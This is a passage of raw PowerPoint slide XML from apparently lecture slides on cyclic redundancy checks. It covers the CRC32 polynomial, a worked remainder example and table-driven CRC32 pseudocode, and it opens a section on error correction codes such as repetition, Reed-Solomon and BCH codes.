                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>26</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>23</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>22</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>16</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>12</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>11</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>10</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>8</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>7</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>5</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>4</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" baseline="30000" dirty="0"/>
                  <a:t>2</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> + x + 1</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr fontAlgn="base"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>Or, </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>in hex and binary:</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr" fontAlgn="base">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0x 01 04 C1 1D B7</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>1 0000 0100 1100 0001 0001 1101 1011 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>0111</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:spcBef>
                    <a:spcPts val="1200"/>
                  </a:spcBef>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>Any binary string can be written as a polynomial: </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>p</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>(</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="en-US" dirty="0"/>
                      <m:t>x</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>)</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>. If its degree is &gt; 32 it can be reduced modulo the polynomial for CRC32.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>The Cyclic Redundancy Check of </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>string</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" b="0" i="0" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>, </m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>denoted by CRC32, of </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>is obtained by first representing it as a polynomial </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <m:rPr>
                        <m:sty m:val="p"/>
                      </m:rPr>
                      <a:rPr lang="en-US">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>p</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>(</m:t>
                    </m:r>
                    <m:r>
                      <m:rPr>
                        <m:nor/>
                      </m:rPr>
                      <a:rPr lang="en-US" dirty="0"/>
                      <m:t>x</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>)</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t> and then taking its </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>remainder </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>modulo the polynomial CRC32.</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:spcBef>
                    <a:spcPts val="1200"/>
                  </a:spcBef>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
                  <a:t>Example</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>: The CRC32 of </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0x </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>01 0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>C1 1D B7</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>is</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0" algn="ctr">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0x </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="90000"/>
                        <a:lumOff val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>E</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> 00 00</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>00</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:spcBef>
                    <a:spcPts val="1200"/>
                  </a:spcBef>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>since:  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0x 01 0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> C1 1D </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>B7 = </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0x 01 04 C1 1D </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>B7  </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <a:rPr lang="en-US" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                        <a:ea typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>⨁</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>  </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0x </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="90000"/>
                        <a:lumOff val="10000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>0 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>E 00 00</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>00</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" dirty="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:spcBef>
                    <a:spcPts val="1200"/>
                  </a:spcBef>
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="114300" indent="0">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
              </a:p>
              <a:p>
                <a:pPr marL="11430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524000"/>
                <a:ext cx="8077200" cy="5105400"/>
              </a:xfrm>
              <a:blipFill rotWithShape="1">
                <a:blip r:embed="rId2"/>
                <a:stretch>
                  <a:fillRect/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3775308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chemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cyclic Redundancy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Checks: CRC32</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1447800"/>
            <a:ext cx="8001000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CRC32 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data: Bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//Array of bytes </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> crc32: UInt32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//32-bit unsigned crc-32 value</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Initialize crc-32 to starting value </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>crc32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>← </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>for each</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nLookupIndex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>← (crc32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> byte) and 0xFF; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>crc32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>← (crc32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CRCTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nLookupIndex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CRCTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>array </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                                                                                     256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>32-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>constants</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Finalize the CRC-32 value by inverting all the bits </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>crc32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>← crc32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0xFFFFFFFF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> crc32</a:t>
            </a:r>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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1297523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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2. Error Correction Codes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="7620000" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> error correction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is used for controlling errors in data over unreliable or noisy communication channels. The central idea is the sender encodes the message with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>some redundancy which is then used to correct errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A trivial error correction code: repeat the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>bitstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> message to be transmitted three times. Using a majority vote will correct single-bit errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some of the most efficient error correction codes are the RS codes (Reed-Solomon), the BCH codes (Bose–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Chaudhuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hocquenghem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
